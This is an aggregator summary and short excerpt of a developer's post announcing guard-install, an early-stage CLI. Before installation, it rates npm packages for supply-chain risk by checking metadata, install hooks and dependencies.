npm installs packages blindly — I built a CLI to fix that
Nithin D J developed a CLI tool called guard-install to analyze npm packages for potential security risks before installation. The tool evaluates package metadata, install scripts, and dependencies to generate a risk score and advises on safe installation practices. It aims to address the growing concern of supply chain attacks in the npm ecosystem.
- ▪The CLI tool guard-install checks npm package metadata such as publish recency, maintainers, and download counts.
- ▪It detects potentially dangerous install scripts like postinstall and preinstall hooks.
- ▪The tool scans dependencies up to a certain depth and calculates a risk level of LOW, MEDIUM, or HIGH.
- ▪guard-install provides explanations for its risk assessment and recommends safe installation using --ignore-scripts.
- ▪The project is in early version (v0.1.1) and available via GitHub and npm.
Opening excerpt (first ~120 words) tap to expand
try { if(localStorage) { let currentUser = localStorage.getItem('current_user'); if (currentUser) { currentUser = JSON.parse(currentUser); if (currentUser.id === 3907446) { document.getElementById('article-show-container').classList.add('current-user-is-article-author'); } } } } catch (e) { console.error(e); } Nithin D J Posted on May 2 npm installs packages blindly — I built a CLI to fix that #cli #npm #security #showdev Hey everyone, I recently built a small CLI tool called guard-install that analyzes npm packages for potential risks before installing them. 👉 Try it: npx guard-install axios The idea came from noticing how npm installs packages blindly, even though supply chain attacks and malicious packages are becoming more common.
…
Excerpt limited to ~120 words for fair-use compliance. The full article is at DEV Community.
Discussion
0 commentsMore from DEV Community
